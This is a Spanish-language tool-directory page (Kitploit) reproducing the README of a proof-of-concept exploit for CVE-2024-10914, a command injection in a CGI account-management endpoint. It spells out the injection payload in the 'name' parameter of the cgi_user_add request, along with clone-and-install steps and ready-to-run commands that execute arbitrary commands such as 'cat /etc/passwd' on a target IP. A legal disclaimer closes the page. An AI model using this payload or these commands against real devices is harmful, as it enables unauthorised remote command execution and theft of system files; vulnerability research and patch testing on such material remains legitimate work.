Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-10914__POC — PoC para explotar el CVE-2024-10914 | Kitploit
Herramientas/GitHubGitHub/0xss3k/cve-2024-10914__poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y Educación
GitHub0xss3k/cve-2024-10914__poc

CVE-2024-10914__POC

PoC para explotar el CVE-2024-10914

Ver Repositorio
8hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-10914 - Proof of Concept

Exploit para vulnerabilidad de inyección de comando en el endpoint /cgi-bin/account_mgr.cgi. Esta vulnerabilidad permite ejecutar comandos arbitrarios en el sistema afectado a través de parámetros no sanitizados.

Descripción de la Vulnerabilidad

CVE-2024-10914 es una vulnerabilidad de inyección de comandos que afecta a dispositivos con interfaz web CGI. La aplicación vulnerable no valida correctamente el parámetro name en la solicitud cgi_user_add, permitiendo que un atacante inyecte comandos del sistema que se ejecutarán con privilegios de la aplicación.

Requisitos

  • Python 3.7+
  • requests library

Instalación

Clone el repositorio y instale las dependencias:

git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt

O instale manualmente:

pip install requests

Uso

El script proporciona dos argumentos:

python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>

Parámetros

  • -u, --url (requerido): URL del objetivo (ejemplo: http://192.168.1.1)
  • -c, --command (opcional): Comando a ejecutar (default: id)

Ejemplos

Ejecutar comando id:

python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1

Ejecutar comando personalizado:

python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"

Listar archivos:

python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"

Funcionamiento Técnico

El exploit envía una solicitud GET al endpoint vulnerable con el siguiente payload:

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "

La cadena vacía se cierra con comillas y se inyecta el comando deseado, que se ejecuta en el contexto del servidor.

Respuesta

El script mostrará:

  • Estado de la conexión
  • Payload enviado
  • Código de estado HTTP
  • Respuesta completa del servidor

Advertencia Legal

Este código es proporcionado únicamente con fines educativos y de investigación de seguridad. Solo debe utilizarse en sistemas de los que tenga autorización explícita. El uso no autorizado de este exploit puede violar leyes locales y constituir un delito. El autor no se responsabiliza por el mal uso de esta herramienta.

Referencias

  • CVE-2024-10914
  • CVSS Score: TBD

Autor

SS3K

Licencia

No especificada

Descargar herramienta